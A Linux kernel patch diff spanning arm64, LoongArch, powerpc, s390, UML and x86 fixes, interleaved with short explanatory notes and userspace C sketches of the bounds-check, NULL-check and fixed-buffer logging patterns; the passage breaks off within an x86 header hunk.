+diff --git a/arch/arm64/boot/dts/amlogic/meson-s4-s805x2-aq222.dts b/arch/arm64/boot/dts/amlogic/meson-s4-s805x2-aq222.dts
+index 8ffbcb2b1ac59..bbd3c05cbd908 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-s4-s805x2-aq222.dts
++++ b/arch/arm64/boot/dts/amlogic/meson-s4-s805x2-aq222.dts
+@@ -15,7 +15,7 @@
+ 	#size-cells = <2>;
+ 
+ 	aliases {
+-		serial0 = &uart_B;
++		serial0 = &uart_b;
+ 	};
+ 
+ 	memory@0 {
+@@ -25,6 +25,6 @@
+ 
+ };
+ 
+-&uart_B {
++&uart_b {
+ 	status = "okay";
+ };
+diff --git a/arch/arm64/boot/dts/amlogic/meson-s4.dtsi b/arch/arm64/boot/dts/amlogic/meson-s4.dtsi
+index ad50cba42d19a..372a03762d69b 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-s4.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-s4.dtsi
+@@ -118,14 +118,14 @@
+ 					<10 11 12 13 14 15 16 17 18 19 20 21>;
+ 			};
+ 
+-			uart_B: serial@7a000 {
++			uart_b: serial@7a000 {
+ 				compatible = "amlogic,meson-s4-uart",
+ 					     "amlogic,meson-ao-uart";
+ 				reg = <0x0 0x7a000 0x0 0x18>;
+ 				interrupts = <GIC_SPI 169 IRQ_TYPE_EDGE_RISING>;
+-				status = "disabled";
+ 				clocks = <&xtal>, <&xtal>, <&xtal>;
+ 				clock-names = "xtal", "pclk", "baud";
++				status = "disabled";
+ 			};
+ 
+ 			reset: reset-controller@2000 {
+diff --git a/arch/arm64/boot/dts/qcom/msm8996.dtsi b/arch/arm64/boot/dts/qcom/msm8996.dtsi
+index 9de2248a385a5..789121171a110 100644
+--- a/arch/arm64/boot/dts/qcom/msm8996.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8996.dtsi
+@@ -390,6 +390,19 @@
+ 		reg = <0x0 0x80000000 0x0 0x0>;
+ 	};
+ 
++	etm {
++		compatible = "qcom,coresight-remote-etm";
++
++		out-ports {
++			port {
++				modem_etm_out_funnel_in2: endpoint {
++					remote-endpoint =
++					  <&funnel_in2_in_modem_etm>;
++				};
++			};
++		};
++	};
++
+ 	psci {
+ 		compatible = "arm,psci-1.0";
+ 		method = "smc";
+@@ -2565,6 +2578,14 @@
+ 			clocks = <&rpmcc RPM_QDSS_CLK>, <&rpmcc RPM_QDSS_A_CLK>;
+ 			clock-names = "apb_pclk", "atclk";
+ 
++			in-ports {
++				port {
++					funnel_in2_in_modem_etm: endpoint {
++						remote-endpoint =
++						  <&modem_etm_out_funnel_in2>;
++					};
++				};
++			};
+ 
+ 			out-ports {
+ 				port {
+diff --git a/arch/arm64/boot/dts/qcom/msm8998.dtsi b/arch/arm64/boot/dts/qcom/msm8998.dtsi
+index b00b8164c4aa2..7a41250539ff5 100644
+--- a/arch/arm64/boot/dts/qcom/msm8998.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8998.dtsi
+@@ -1903,9 +1903,11 @@
+ 
+ 			cpu = <&CPU4>;
+ 
+-			port{
+-				etm4_out: endpoint {
+-					remote-endpoint = <&apss_funnel_in4>;
++			out-ports {
++				port{
++					etm4_out: endpoint {
++						remote-endpoint = <&apss_funnel_in4>;
++					};
+ 				};
+ 			};
+ 		};
+@@ -1920,9 +1922,11 @@
+ 
+ 			cpu = <&CPU5>;
+ 
+-			port{
+-				etm5_out: endpoint {
+-					remote-endpoint = <&apss_funnel_in5>;
++			out-ports {
++				port{
++					etm5_out: endpoint {
++						remote-endpoint = <&apss_funnel_in5>;
++					};
+ 				};
+ 			};
+ 		};
+@@ -1937,9 +1941,11 @@
+ 
+ 			cpu = <&CPU6>;
+ 
+-			port{
+-				etm6_out: endpoint {
+-					remote-endpoint = <&apss_funnel_in6>;
++			out-ports {
++				port{
++					etm6_out: endpoint {
++						remote-endpoint = <&apss_funnel_in6>;
++					};
+ 				};
+ 			};
+ 		};
+@@ -1954,9 +1960,11 @@
+ 
+ 			cpu = <&CPU7>;
+ 
+-			port{
+-				etm7_out: endpoint {
+-					remote-endpoint = <&apss_funnel_in7>;
++			out-ports {
++				port{
++					etm7_out: endpoint {
++						remote-endpoint = <&apss_funnel_in7>;
++					};
+ 				};
+ 			};
+ 		};
+diff --git a/arch/arm64/include/asm/irq_work.h b/arch/arm64/include/asm/irq_work.h
+index 81bbfa3a035bd..a1020285ea750 100644
+--- a/arch/arm64/include/asm/irq_work.h
++++ b/arch/arm64/include/asm/irq_work.h
+@@ -2,8 +2,6 @@
+ #ifndef __ASM_IRQ_WORK_H
+ #define __ASM_IRQ_WORK_H
+ 
+-extern void arch_irq_work_raise(void);
+-
+ static inline bool arch_irq_work_has_interrupt(void)
+ {
+ 	return true;
+diff --git a/arch/arm64/kernel/irq.c b/arch/arm64/kernel/irq.c
+index 38dbd3828f139..d2850b49a3710 100644
+--- a/arch/arm64/kernel/irq.c
++++ b/arch/arm64/kernel/irq.c
+@@ -22,6 +22,7 @@
+ #include <linux/vmalloc.h>
+ #include <asm/daifflags.h>
+ #include <asm/exception.h>
++#include <asm/numa.h>
+ #include <asm/vmap_stack.h>
+ #include <asm/softirq_stack.h>
+ 
+@@ -46,17 +47,17 @@ static void init_irq_scs(void)
+ 
+ 	for_each_possible_cpu(cpu)
+ 		per_cpu(irq_shadow_call_stack_ptr, cpu) =
+-			scs_alloc(cpu_to_node(cpu));
++			scs_alloc(early_cpu_to_node(cpu));
+ }
+ 
+ #ifdef CONFIG_VMAP_STACK
+-static void init_irq_stacks(void)
++static void __init init_irq_stacks(void)
+ {
+ 	int cpu;
+ 	unsigned long *p;
+ 
+ 	for_each_possible_cpu(cpu) {
+-		p = arch_alloc_vmap_stack(IRQ_STACK_SIZE, cpu_to_node(cpu));
++		p = arch_alloc_vmap_stack(IRQ_STACK_SIZE, early_cpu_to_node(cpu));
+ 		per_cpu(irq_stack_ptr, cpu) = p;
+ 	}
+ }
+diff --git a/arch/arm64/kernel/perf_event.c b/arch/arm64/kernel/perf_event.c
+index 7b0643fe2f134..214b1805e536e 100644
+--- a/arch/arm64/kernel/perf_event.c
++++ b/arch/arm64/kernel/perf_event.c
+@@ -168,7 +168,11 @@ armv8pmu_events_sysfs_show(struct device *dev,
+ 	PMU_EVENT_ATTR_ID(name, armv8pmu_events_sysfs_show, config)
+ 
+ static struct attribute *armv8_pmuv3_event_attrs[] = {
+-	ARMV8_EVENT_ATTR(sw_incr, ARMV8_PMUV3_PERFCTR_SW_INCR),
++	/*
++	 * Don't expose the sw_incr event in /sys. It's not usable as writes to
++	 * PMSWINC_EL0 will trap as PMUSERENR.{SW,EN}=={0,0} and event rotation
++	 * means we don't have a fixed event<->counter relationship regardless.
++	 */
+ 	ARMV8_EVENT_ATTR(l1i_cache_refill, ARMV8_PMUV3_PERFCTR_L1I_CACHE_REFILL),
+ 	ARMV8_EVENT_ATTR(l1i_tlb_refill, ARMV8_PMUV3_PERFCTR_L1I_TLB_REFILL),
+ 	ARMV8_EVENT_ATTR(l1d_cache_refill, ARMV8_PMUV3_PERFCTR_L1D_CACHE_REFILL),
+diff --git a/arch/csky/include/asm/irq_work.h b/arch/csky/include/asm/irq_work.h
+index 33aaf39d6f94f..d39fcc1f5395f 100644
+--- a/arch/csky/include/asm/irq_work.h
++++ b/arch/csky/include/asm/irq_work.h
+@@ -7,5 +7,5 @@ static inline bool arch_irq_work_has_interrupt(void)
+ {
+ 	return true;
+ }
+-extern void arch_irq_work_raise(void);
++
+ #endif /* __ASM_CSKY_IRQ_WORK_H */
+diff --git a/arch/loongarch/kernel/smp.c b/arch/loongarch/kernel/smp.c
+index 434bfc1cd31a4..e0404df2c952f 100644
+--- a/arch/loongarch/kernel/smp.c
++++ b/arch/loongarch/kernel/smp.c
+@@ -473,7 +473,6 @@ asmlinkage void start_secondary(void)
+ 	sync_counter();
+ 	cpu = raw_smp_processor_id();
+ 	set_my_cpu_offset(per_cpu_offset(cpu));
+-	rcu_cpu_starting(cpu);
+ 
+ 	cpu_probe();
+ 	constant_clockevent_init();
+diff --git a/arch/loongarch/mm/tlb.c b/arch/loongarch/mm/tlb.c
+index da3681f131c8d..eeb2d815cfa2a 100644
+--- a/arch/loongarch/mm/tlb.c
++++ b/arch/loongarch/mm/tlb.c
+@@ -271,12 +271,16 @@ void setup_tlb_handler(int cpu)
+ 		set_handler(EXCCODE_TLBNR * VECSIZE, handle_tlb_protect, VECSIZE);
+ 		set_handler(EXCCODE_TLBNX * VECSIZE, handle_tlb_protect, VECSIZE);
+ 		set_handler(EXCCODE_TLBPE * VECSIZE, handle_tlb_protect, VECSIZE);
+-	}
++	} else {
++		int vec_sz __maybe_unused;
++		void *addr __maybe_unused;
++		struct page *page __maybe_unused;
++
++		/* Avoid lockdep warning */
++		rcu_cpu_starting(cpu);
++
+ #ifdef CONFIG_NUMA
+-	else {
+-		void *addr;
+-		struct page *page;
+-		const int vec_sz = sizeof(exception_handlers);
++		vec_sz = sizeof(exception_handlers);
+ 
+ 		if (pcpu_handlers[cpu])
+ 			return;
+@@ -292,8 +296,8 @@ void setup_tlb_handler(int cpu)
+ 		csr_write64(pcpu_handlers[cpu], LOONGARCH_CSR_EENTRY);
+ 		csr_write64(pcpu_handlers[cpu], LOONGARCH_CSR_MERRENTRY);
+ 		csr_write64(pcpu_handlers[cpu] + 80*VECSIZE, LOONGARCH_CSR_TLBRENTRY);
+-	}
+ #endif
++	}
+ }
+ 
+ void tlb_init(int cpu)
+diff --git a/arch/powerpc/include/asm/irq_work.h b/arch/powerpc/include/asm/irq_work.h
+index b8b0be8f1a07e..c6d3078bd8c3b 100644
+--- a/arch/powerpc/include/asm/irq_work.h
++++ b/arch/powerpc/include/asm/irq_work.h
+@@ -6,6 +6,5 @@ static inline bool arch_irq_work_has_interrupt(void)
+ {
+ 	return true;
+ }
+-extern void arch_irq_work_raise(void);
+ 
+ #endif /* _ASM_POWERPC_IRQ_WORK_H */
+diff --git a/arch/powerpc/include/asm/mmu.h b/arch/powerpc/include/asm/mmu.h
+index 94b981152667c..07fabb054aea4 100644
+--- a/arch/powerpc/include/asm/mmu.h
++++ b/arch/powerpc/include/asm/mmu.h
+@@ -417,5 +417,9 @@ extern void *abatron_pteptrs[2];
+ #include <asm/nohash/mmu.h>
+ #endif
+ 
++#if defined(CONFIG_FA_DUMP) || defined(CONFIG_PRESERVE_FA_DUMP)
++#define __HAVE_ARCH_RESERVED_KERNEL_PAGES
++#endif
++
+ #endif /* __KERNEL__ */
+ #endif /* _ASM_POWERPC_MMU_H_ */
+diff --git a/arch/powerpc/include/asm/mmzone.h b/arch/powerpc/include/asm/mmzone.h
+index 4c6c6dbd182f4..da827d2d08666 100644
+--- a/arch/powerpc/include/asm/mmzone.h
++++ b/arch/powerpc/include/asm/mmzone.h
+@@ -42,14 +42,6 @@ u64 memory_hotplug_max(void);
+ #else
+ #define memory_hotplug_max() memblock_end_of_DRAM()
+ #endif /* CONFIG_NUMA */
+-#ifdef CONFIG_FA_DUMP
+-#define __HAVE_ARCH_RESERVED_KERNEL_PAGES
+-#endif
+-
+-#ifdef CONFIG_MEMORY_HOTPLUG
+-extern int create_section_mapping(unsigned long start, unsigned long end,
+-				  int nid, pgprot_t prot);
+-#endif
+ 
+ #endif /* __KERNEL__ */
+ #endif /* _ASM_MMZONE_H_ */
+diff --git a/arch/powerpc/kernel/traps.c b/arch/powerpc/kernel/traps.c
+index 3956f32682c62..362b712386f64 100644
+--- a/arch/powerpc/kernel/traps.c
++++ b/arch/powerpc/kernel/traps.c
+@@ -1439,10 +1439,12 @@ static int emulate_instruction(struct pt_regs *regs)
+ 	return -EINVAL;
+ }
+ 
++#ifdef CONFIG_GENERIC_BUG
+ int is_valid_bugaddr(unsigned long addr)
+ {
+ 	return is_kernel_addr(addr);
+ }
++#endif
+ 
+ #ifdef CONFIG_MATH_EMULATION
+ static int emulate_math(struct pt_regs *regs)
+diff --git a/arch/powerpc/lib/sstep.c b/arch/powerpc/lib/sstep.c
+index 398b5694aeb70..ec30af8eadb7d 100644
+--- a/arch/powerpc/lib/sstep.c
++++ b/arch/powerpc/lib/sstep.c
+@@ -586,6 +586,8 @@ static int do_fp_load(struct instruction_op *op, unsigned long ea,
+ 	} u;
+ 
+ 	nb = GETSIZE(op->type);
++	if (nb > sizeof(u))
++		return -EINVAL;
+ 	if (!address_ok(regs, ea, nb))
+ 		return -EFAULT;
+ 	rn = op->reg;
+@@ -636,6 +638,8 @@ static int do_fp_store(struct instruction_op *op, unsigned long ea,
+ 	} u;
+ 
+ 	nb = GETSIZE(op->type);
++	if (nb > sizeof(u))
++		return -EINVAL;
+ 	if (!address_ok(regs, ea, nb))
+ 		return -EFAULT;
+ 	rn = op->reg;
+@@ -680,6 +684,9 @@ static nokprobe_inline int do_vec_load(int rn, unsigned long ea,
+ 		u8 b[sizeof(__vector128)];
+ 	} u = {};
+ 
++	if (size > sizeof(u))
++		return -EINVAL;
++
+ 	if (!address_ok(regs, ea & ~0xfUL, 16))
+ 		return -EFAULT;
+ 	/* align to multiple of size */
+@@ -707,6 +714,9 @@ static nokprobe_inline int do_vec_store(int rn, unsigned long ea,
+ 		u8 b[sizeof(__vector128)];
+ 	} u;
+ 
++	if (size > sizeof(u))
++		return -EINVAL;
++
+ 	if (!address_ok(regs, ea & ~0xfUL, 16))
+ 		return -EFAULT;
+ 	/* align to multiple of size */
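
The four checks added above all guard the same hazard: GETSIZE() comes from a
decoded instruction, so an oversized operand would overflow the on-stack union
used as a scratch buffer. A minimal userspace sketch of the pattern — the union
layout and the names emulated_load()/ldbuf are illustrative, not the kernel's:

#include <stdint.h>
#include <stdio.h>
#include <string.h>

union ldbuf {
	int64_t  d;
	uint32_t w[2];
	uint8_t  b[8];
};

/* Validate the access size against the scratch union before copying,
 * instead of trusting the decoded operand. */
static int emulated_load(union ldbuf *u, const void *src, size_t nb)
{
	if (nb > sizeof(*u))
		return -1;	/* would overflow the on-stack union */
	memset(u, 0, sizeof(*u));
	memcpy(u->b, src, nb);
	return 0;
}

int main(void)
{
	union ldbuf u;
	uint8_t mem[16] = { 1, 2, 3, 4 };

	printf("4 bytes:  %d\n", emulated_load(&u, mem, 4));	/* fits */
	printf("16 bytes: %d\n", emulated_load(&u, mem, 16));	/* rejected */
	return 0;
}

Rejecting the size before any memset()/memcpy() keeps the bound in one place
rather than relying on every caller to have checked it.
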
+diff --git a/arch/powerpc/mm/book3s64/pgtable.c b/arch/powerpc/mm/book3s64/pgtable.c
+index f6151a5892982..87aa76c737995 100644
+--- a/arch/powerpc/mm/book3s64/pgtable.c
++++ b/arch/powerpc/mm/book3s64/pgtable.c
+@@ -463,6 +463,7 @@ void ptep_modify_prot_commit(struct vm_area_struct *vma, unsigned long addr,
+ 	set_pte_at(vma->vm_mm, addr, ptep, pte);
+ }
+ 
++#ifdef CONFIG_TRANSPARENT_HUGEPAGE
+ /*
+  * For hash translation mode, we use the deposited table to store hash slot
+  * information and they are stored at PTRS_PER_PMD offset from related pmd
+@@ -484,6 +485,7 @@ int pmd_move_must_withdraw(struct spinlock *new_pmd_ptl,
+ 
+ 	return true;
+ }
++#endif
+ 
+ /*
+  * Does the CPU support tlbie?
+diff --git a/arch/powerpc/mm/init-common.c b/arch/powerpc/mm/init-common.c
+index 119ef491f7976..d3a7726ecf512 100644
+--- a/arch/powerpc/mm/init-common.c
++++ b/arch/powerpc/mm/init-common.c
+@@ -126,7 +126,7 @@ void pgtable_cache_add(unsigned int shift)
+ 	 * as to leave enough 0 bits in the address to contain it. */
+ 	unsigned long minalign = max(MAX_PGTABLE_INDEX_SIZE + 1,
+ 				     HUGEPD_SHIFT_MASK + 1);
+-	struct kmem_cache *new;
++	struct kmem_cache *new = NULL;
+ 
+ 	/* It would be nice if this was a BUILD_BUG_ON(), but at the
+ 	 * moment, gcc doesn't seem to recognize is_power_of_2 as a
+@@ -139,7 +139,8 @@ void pgtable_cache_add(unsigned int shift)
+ 
+ 	align = max_t(unsigned long, align, minalign);
+ 	name = kasprintf(GFP_KERNEL, "pgtable-2^%d", shift);
+-	new = kmem_cache_create(name, table_size, align, 0, ctor(shift));
++	if (name)
++		new = kmem_cache_create(name, table_size, align, 0, ctor(shift));
+ 	if (!new)
+ 		panic("Could not allocate pgtable cache for order %d", shift);
+ 
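
kasprintf() can return NULL under memory pressure, and the old code passed
that NULL straight into kmem_cache_create(). Initializing new to NULL and
gating the second call on the first lets the single if (!new) test cover both
failure modes. A userspace sketch of the same shape — POSIX strdup() stands in
for kasprintf(), and make_cache_name() is illustrative:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Initialize the result to NULL and only attempt the second step when
 * the prerequisite succeeded, so one check covers both failures. */
static char *make_cache_name(int shift)
{
	char *name = NULL;
	char buf[32];

	if (snprintf(buf, sizeof(buf), "pgtable-2^%d", shift) > 0)
		name = strdup(buf);
	return name;	/* NULL on either failure */
}

int main(void)
{
	char *name = make_cache_name(9);

	if (!name) {
		fprintf(stderr, "could not allocate cache name\n");
		return 1;
	}
	puts(name);
	free(name);
	return 0;
}
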
+diff --git a/arch/powerpc/mm/mmu_decl.h b/arch/powerpc/mm/mmu_decl.h
+index bd9784f77f2ee..71250605b7845 100644
+--- a/arch/powerpc/mm/mmu_decl.h
++++ b/arch/powerpc/mm/mmu_decl.h
+@@ -179,3 +179,8 @@ static inline bool debug_pagealloc_enabled_or_kfence(void)
+ {
+ 	return IS_ENABLED(CONFIG_KFENCE) || debug_pagealloc_enabled();
+ }
++
++#ifdef CONFIG_MEMORY_HOTPLUG
++int create_section_mapping(unsigned long start, unsigned long end,
++			   int nid, pgprot_t prot);
++#endif
+diff --git a/arch/riscv/include/asm/irq_work.h b/arch/riscv/include/asm/irq_work.h
+index b53891964ae03..b27a4d64fc6a0 100644
+--- a/arch/riscv/include/asm/irq_work.h
++++ b/arch/riscv/include/asm/irq_work.h
+@@ -6,5 +6,5 @@ static inline bool arch_irq_work_has_interrupt(void)
+ {
+ 	return IS_ENABLED(CONFIG_SMP);
+ }
+-extern void arch_irq_work_raise(void);
++
+ #endif /* _ASM_RISCV_IRQ_WORK_H */
+diff --git a/arch/s390/include/asm/irq_work.h b/arch/s390/include/asm/irq_work.h
+index 603783766d0ab..f00c9f610d5a8 100644
+--- a/arch/s390/include/asm/irq_work.h
++++ b/arch/s390/include/asm/irq_work.h
+@@ -7,6 +7,4 @@ static inline bool arch_irq_work_has_interrupt(void)
+ 	return true;
+ }
+ 
+-void arch_irq_work_raise(void);
+-
+ #endif /* _ASM_S390_IRQ_WORK_H */
+diff --git a/arch/s390/kernel/ptrace.c b/arch/s390/kernel/ptrace.c
+index 092b16b4dd4f6..6b442edb38571 100644
+--- a/arch/s390/kernel/ptrace.c
++++ b/arch/s390/kernel/ptrace.c
+@@ -385,6 +385,7 @@ static int __poke_user(struct task_struct *child, addr_t addr, addr_t data)
+ 		/*
+ 		 * floating point control reg. is in the thread structure
+ 		 */
++		save_fpu_regs();
+ 		if ((unsigned int) data != 0 ||
+ 		    test_fp_ctl(data >> (BITS_PER_LONG - 32)))
+ 			return -EINVAL;
+@@ -741,6 +742,7 @@ static int __poke_user_compat(struct task_struct *child,
+ 		/*
+ 		 * floating point control reg. is in the thread structure
+ 		 */
++		save_fpu_regs();
+ 		if (test_fp_ctl(tmp))
+ 			return -EINVAL;
+ 		child->thread.fpu.fpc = data;
+@@ -904,9 +906,7 @@ static int s390_fpregs_set(struct task_struct *target,
+ 	int rc = 0;
+ 	freg_t fprs[__NUM_FPRS];
+ 
+-	if (target == current)
+-		save_fpu_regs();
+-
++	save_fpu_regs();
+ 	if (MACHINE_HAS_VX)
+ 		convert_vx_to_fp(fprs, target->thread.fpu.vxrs);
+ 	else
+diff --git a/arch/s390/kvm/kvm-s390.c b/arch/s390/kvm/kvm-s390.c
+index 3775363471f0c..f604946ab2c85 100644
+--- a/arch/s390/kvm/kvm-s390.c
++++ b/arch/s390/kvm/kvm-s390.c
+@@ -4138,10 +4138,6 @@ int kvm_arch_vcpu_ioctl_set_fpu(struct kvm_vcpu *vcpu, struct kvm_fpu *fpu)
+ 
+ 	vcpu_load(vcpu);
+ 
+-	if (test_fp_ctl(fpu->fpc)) {
+-		ret = -EINVAL;
+-		goto out;
+-	}
+ 	vcpu->run->s.regs.fpc = fpu->fpc;
+ 	if (MACHINE_HAS_VX)
+ 		convert_fp_to_vx((__vector128 *) vcpu->run->s.regs.vrs,
+@@ -4149,7 +4145,6 @@ int kvm_arch_vcpu_ioctl_set_fpu(struct kvm_vcpu *vcpu, struct kvm_fpu *fpu)
+ 	else
+ 		memcpy(vcpu->run->s.regs.fprs, &fpu->fprs, sizeof(fpu->fprs));
+ 
+-out:
+ 	vcpu_put(vcpu);
+ 	return ret;
+ }
+diff --git a/arch/um/drivers/net_kern.c b/arch/um/drivers/net_kern.c
+index 3d7836c465070..cabcc501b448a 100644
+--- a/arch/um/drivers/net_kern.c
++++ b/arch/um/drivers/net_kern.c
+@@ -204,7 +204,7 @@ static int uml_net_close(struct net_device *dev)
+ 	return 0;
+ }
+ 
+-static int uml_net_start_xmit(struct sk_buff *skb, struct net_device *dev)
++static netdev_tx_t uml_net_start_xmit(struct sk_buff *skb, struct net_device *dev)
+ {
+ 	struct uml_net_private *lp = netdev_priv(dev);
+ 	unsigned long flags;
+diff --git a/arch/um/include/shared/kern_util.h b/arch/um/include/shared/kern_util.h
+index d8b8b4f07e429..444bae755b16a 100644
+--- a/arch/um/include/shared/kern_util.h
++++ b/arch/um/include/shared/kern_util.h
+@@ -50,7 +50,7 @@ extern void do_uml_exitcalls(void);
+  * Are we disallowed to sleep? Used to choose between GFP_KERNEL and
+  * GFP_ATOMIC.
+  */
+-extern int __cant_sleep(void);
++extern int __uml_cant_sleep(void);
+ extern int get_current_pid(void);
+ extern int copy_from_user_proc(void *to, void *from, int size);
+ extern char *uml_strdup(const char *string);
+diff --git a/arch/um/kernel/process.c b/arch/um/kernel/process.c
+index 010bc422a09dd..a351c87db2488 100644
+--- a/arch/um/kernel/process.c
++++ b/arch/um/kernel/process.c
+@@ -220,7 +220,7 @@ void arch_cpu_idle(void)
+ 	raw_local_irq_enable();
+ }
+ 
+-int __cant_sleep(void) {
++int __uml_cant_sleep(void) {
+ 	return in_atomic() || irqs_disabled() || in_interrupt();
+ 	/* Is in_interrupt() really needed? */
+ }
+diff --git a/arch/um/kernel/time.c b/arch/um/kernel/time.c
+index fddd1dec27e6d..3e270da6b6f67 100644
+--- a/arch/um/kernel/time.c
++++ b/arch/um/kernel/time.c
+@@ -432,9 +432,29 @@ static void time_travel_update_time(unsigned long long next, bool idle)
+ 	time_travel_del_event(&ne);
+ }
+ 
++static void time_travel_update_time_rel(unsigned long long offs)
++{
++	unsigned long flags;
++
++	/*
++	 * Disable interrupts before calculating the new time so
++	 * that a real timer interrupt (signal) can't happen at
++	 * a bad time e.g. after we read time_travel_time but
++	 * before we've completed updating the time.
++	 */
++	local_irq_save(flags);
++	time_travel_update_time(time_travel_time + offs, false);
++	local_irq_restore(flags);
++}
++
+ void time_travel_ndelay(unsigned long nsec)
+ {
+-	time_travel_update_time(time_travel_time + nsec, false);
++	/*
++	 * Not strictly needed to use _rel() version since this is
++	 * only used in INFCPU/EXT modes, but it doesn't hurt and
++	 * is more readable too.
++	 */
++	time_travel_update_time_rel(nsec);
+ }
+ EXPORT_SYMBOL(time_travel_ndelay);
+ 
+@@ -568,7 +588,11 @@ static void time_travel_set_start(void)
+ #define time_travel_time 0
+ #define time_travel_ext_waiting 0
+ 
+-static inline void time_travel_update_time(unsigned long long ns, bool retearly)
++static inline void time_travel_update_time(unsigned long long ns, bool idle)
++{
++}
++
++static inline void time_travel_update_time_rel(unsigned long long offs)
+ {
+ }
+ 
+@@ -720,9 +744,7 @@ static u64 timer_read(struct clocksource *cs)
+ 		 */
+ 		if (!irqs_disabled() && !in_interrupt() && !in_softirq() &&
+ 		    !time_travel_ext_waiting)
+-			time_travel_update_time(time_travel_time +
+-						TIMER_MULTIPLIER,
+-						false);
++			time_travel_update_time_rel(TIMER_MULTIPLIER);
+ 		return time_travel_time / TIMER_MULTIPLIER;
+ 	}
+ 
+diff --git a/arch/um/os-Linux/helper.c b/arch/um/os-Linux/helper.c
+index b459745f52e24..3cb8ac63be6ed 100644
+--- a/arch/um/os-Linux/helper.c
++++ b/arch/um/os-Linux/helper.c
+@@ -46,7 +46,7 @@ int run_helper(void (*pre_exec)(void *), void *pre_data, char **argv)
+ 	unsigned long stack, sp;
+ 	int pid, fds[2], ret, n;
+ 
+-	stack = alloc_stack(0, __cant_sleep());
++	stack = alloc_stack(0, __uml_cant_sleep());
+ 	if (stack == 0)
+ 		return -ENOMEM;
+ 
+@@ -70,7 +70,7 @@ int run_helper(void (*pre_exec)(void *), void *pre_data, char **argv)
+ 	data.pre_data = pre_data;
+ 	data.argv = argv;
+ 	data.fd = fds[1];
+-	data.buf = __cant_sleep() ? uml_kmalloc(PATH_MAX, UM_GFP_ATOMIC) :
++	data.buf = __uml_cant_sleep() ? uml_kmalloc(PATH_MAX, UM_GFP_ATOMIC) :
+ 					uml_kmalloc(PATH_MAX, UM_GFP_KERNEL);
+ 	pid = clone(helper_child, (void *) sp, CLONE_VM, &data);
+ 	if (pid < 0) {
+@@ -121,7 +121,7 @@ int run_helper_thread(int (*proc)(void *), void *arg, unsigned int flags,
+ 	unsigned long stack, sp;
+ 	int pid, status, err;
+ 
+-	stack = alloc_stack(0, __cant_sleep());
++	stack = alloc_stack(0, __uml_cant_sleep());
+ 	if (stack == 0)
+ 		return -ENOMEM;
+ 
+diff --git a/arch/um/os-Linux/util.c b/arch/um/os-Linux/util.c
+index fc0f2a9dee5af..1dca4ffbd572f 100644
+--- a/arch/um/os-Linux/util.c
++++ b/arch/um/os-Linux/util.c
+@@ -173,23 +173,38 @@ __uml_setup("quiet", quiet_cmd_param,
+ "quiet\n"
+ "    Turns off information messages during boot.\n\n");
+ 
++/*
++ * The os_info/os_warn functions will be called by helper threads. These
++ * have a very limited stack size and using the libc formatting functions
++ * may overflow the stack.
++ * So pull in the kernel vscnprintf and use that instead with a fixed
++ * on-stack buffer.
++ */
++int vscnprintf(char *buf, size_t size, const char *fmt, va_list args);
++
+ void os_info(const char *fmt, ...)
+ {
++	char buf[256];
+ 	va_list list;
++	int len;
+ 
+ 	if (quiet_info)
+ 		return;
+ 
+ 	va_start(list, fmt);
+-	vfprintf(stderr, fmt, list);
++	len = vscnprintf(buf, sizeof(buf), fmt, list);
++	fwrite(buf, len, 1, stderr);
+ 	va_end(list);
+ }
+ 
+ void os_warn(const char *fmt, ...)
+ {
++	char buf[256];
+ 	va_list list;
++	int len;
+ 
+ 	va_start(list, fmt);
+-	vfprintf(stderr, fmt, list);
++	len = vscnprintf(buf, sizeof(buf), fmt, list);
++	fwrite(buf, len, 1, stderr);
+ 	va_end(list);
+ }
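
As the comment above notes, the helper threads that call os_info()/os_warn()
run on very small stacks, so the libc vfprintf() path is replaced by the
kernel's vscnprintf() into a fixed 256-byte buffer. The userspace analogue
below uses vsnprintf(), which — unlike vscnprintf() — returns the would-be
length on truncation, hence the explicit clamp; this is a hedged sketch of the
pattern, not the UML code:

#include <stdarg.h>
#include <stdio.h>

/* Format into a fixed on-stack buffer, then write it out in one go. */
static void info(const char *fmt, ...)
{
	char buf[256];
	va_list ap;
	int len;

	va_start(ap, fmt);
	len = vsnprintf(buf, sizeof(buf), fmt, ap);
	va_end(ap);

	if (len < 0)
		return;
	if ((size_t)len >= sizeof(buf))
		len = sizeof(buf) - 1;	/* vsnprintf reports the would-be length */
	fwrite(buf, 1, (size_t)len, stderr);
}

int main(void)
{
	info("console [%s] enabled\n", "ttyS0");
	return 0;
}
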
+diff --git a/arch/x86/boot/compressed/ident_map_64.c b/arch/x86/boot/compressed/ident_map_64.c
+index b4155273df891..d34222816c9f5 100644
+--- a/arch/x86/boot/compressed/ident_map_64.c
++++ b/arch/x86/boot/compressed/ident_map_64.c
+@@ -393,3 +393,8 @@ void do_boot_page_fault(struct pt_regs *regs, unsigned long error_code)
+ 	 */
+ 	kernel_add_identity_map(address, end);
+ }
++
++void do_boot_nmi_trap(struct pt_regs *regs, unsigned long error_code)
++{
++	/* Empty handler to ignore NMI during early boot */
++}
+diff --git a/arch/x86/boot/compressed/idt_64.c b/arch/x86/boot/compressed/idt_64.c
+index 3cdf94b414567..d100284bbef47 100644
+--- a/arch/x86/boot/compressed/idt_64.c
++++ b/arch/x86/boot/compressed/idt_64.c
+@@ -61,6 +61,7 @@ void load_stage2_idt(void)
+ 	boot_idt_desc.address = (unsigned long)boot_idt;
+ 
+ 	set_idt_entry(X86_TRAP_PF, boot_page_fault);
++	set_idt_entry(X86_TRAP_NMI, boot_nmi_trap);
+ 
+ #ifdef CONFIG_AMD_MEM_ENCRYPT
+ 	/*
+diff --git a/arch/x86/boot/compressed/idt_handlers_64.S b/arch/x86/boot/compressed/idt_handlers_64.S
+index 22890e199f5b4..4d03c8562f637 100644
+--- a/arch/x86/boot/compressed/idt_handlers_64.S
++++ b/arch/x86/boot/compressed/idt_handlers_64.S
+@@ -70,6 +70,7 @@ SYM_FUNC_END(\name)
+ 	.code64
+ 
+ EXCEPTION_HANDLER	boot_page_fault do_boot_page_fault error_code=1
++EXCEPTION_HANDLER	boot_nmi_trap do_boot_nmi_trap error_code=0
+ 
+ #ifdef CONFIG_AMD_MEM_ENCRYPT
+ EXCEPTION_HANDLER	boot_stage1_vc do_vc_no_ghcb		error_code=1
+diff --git a/arch/x86/boot/compressed/misc.h b/arch/x86/boot/compressed/misc.h
+index 20118fb7c53bb..a49d9219c06e5 100644
+--- a/arch/x86/boot/compressed/misc.h
